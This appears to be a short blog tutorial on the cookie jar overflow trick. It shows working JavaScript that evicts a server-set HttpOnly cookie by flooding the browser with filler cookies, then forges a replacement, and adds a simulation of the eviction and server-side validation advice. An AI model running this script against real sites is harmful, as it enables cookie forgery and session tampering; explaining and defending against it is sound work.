
Overflowing the Cookie Jar: Overwriting an HttpOnly Cookie with JavaScript

2017-03-07 20:24:30

Backend

If the backend creates a cookie like this:

// Inside a servlet handler; Cookie is javax.servlet.http.Cookie
Cookie cookie = new Cookie("security-cookie", "0123456789");
cookie.setHttpOnly(true);
response.addCookie(cookie);

the front-end user should not be able to overwrite it with JavaScript, for example:

document.cookie="security-cookie=000000001"

but you can do something like this :)

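// Fill the cookie jar past the browser's per-domain limit so the oldest
// cookies, including the HttpOnly one, are evicted.
for (var i = 200; i > 0; i--) {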
    var cookieName = "cookie_spam_" + i;
    var cookieValue = "cookie_spam_" + i;
    document.cookie = cookieName + "=" + cookieValue;
}

// The HttpOnly cookie is gone, so a script-set cookie with the same name is accepted.
document.cookie = "security-cookie=99999999999";

// Expire the filler cookies again so only the replaced security-cookie remains.
for (var i = 200; i > 0; i--) {
    var cookieName = "cookie_spam_" + i;
    var cookieValue = "cookie_spam_" + i;
    document.cookie = cookieName + "=" + cookieValue + ";expires=Thu, 01 Jan 1970 00:00:01 GMT;";
}
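
Why this works, as an added example that is not code from the original post: a simplified model of a browser cookie jar that replays the three steps above. The CookieJar class, the replayOverflow function and the limit of 180 passed to it are assumptions made for illustration; real per-domain limits and eviction order differ between browsers.

```javascript
// Simplified model of a browser cookie jar (an assumption, not real browser code):
// a per-domain cap with oldest-first eviction, and HttpOnly checked only
// when a script writes over a cookie that is still in the jar.
class CookieJar {
  constructor(limit) {
    this.limit = limit;        // hypothetical per-domain cap; real caps vary by browser
    this.cookies = new Map();  // Map keeps insertion order: first key = oldest cookie
  }

  // Set-Cookie from an HTTP response: the only way to create an HttpOnly cookie.
  setFromServer(name, value, httpOnly) {
    this.store(name, { value, httpOnly });
  }

  // document.cookie = "...": returns false when the write is refused.
  setFromScript(name, value, expired = false) {
    const existing = this.cookies.get(name);
    if (existing && existing.httpOnly) return false; // HttpOnly blocks the direct overwrite
    if (expired) { this.cookies.delete(name); return true; }
    this.store(name, { value, httpOnly: false });
    return true;
  }

  store(name, cookie) {
    this.cookies.delete(name); // re-setting a cookie moves it to the newest slot
    this.cookies.set(name, cookie);
    while (this.cookies.size > this.limit) {
      // Eviction ignores HttpOnly: the oldest cookie goes, whoever set it.
      this.cookies.delete(this.cookies.keys().next().value);
    }
  }
}

// Replays the page's three steps against the model and reports the outcome.
function replayOverflow(limit, spamCount) {
  const jar = new CookieJar(limit);
  jar.setFromServer("security-cookie", "0123456789", true);
  const directWrite = jar.setFromScript("security-cookie", "000000001");
  for (let i = spamCount; i > 0; i--) jar.setFromScript("cookie_spam_" + i, "cookie_spam_" + i);
  const evicted = !jar.cookies.has("security-cookie");
  const afterEviction = jar.setFromScript("security-cookie", "99999999999");
  for (let i = spamCount; i > 0; i--) jar.setFromScript("cookie_spam_" + i, "", true);
  return { directWrite, evicted, afterEviction,
           final: jar.cookies.get("security-cookie"), size: jar.cookies.size };
}
```

The Cookie request header carries only names and values, not attributes, so the backend cannot tell the replaced cookie from the one it issued; the value itself has to be validated server-side.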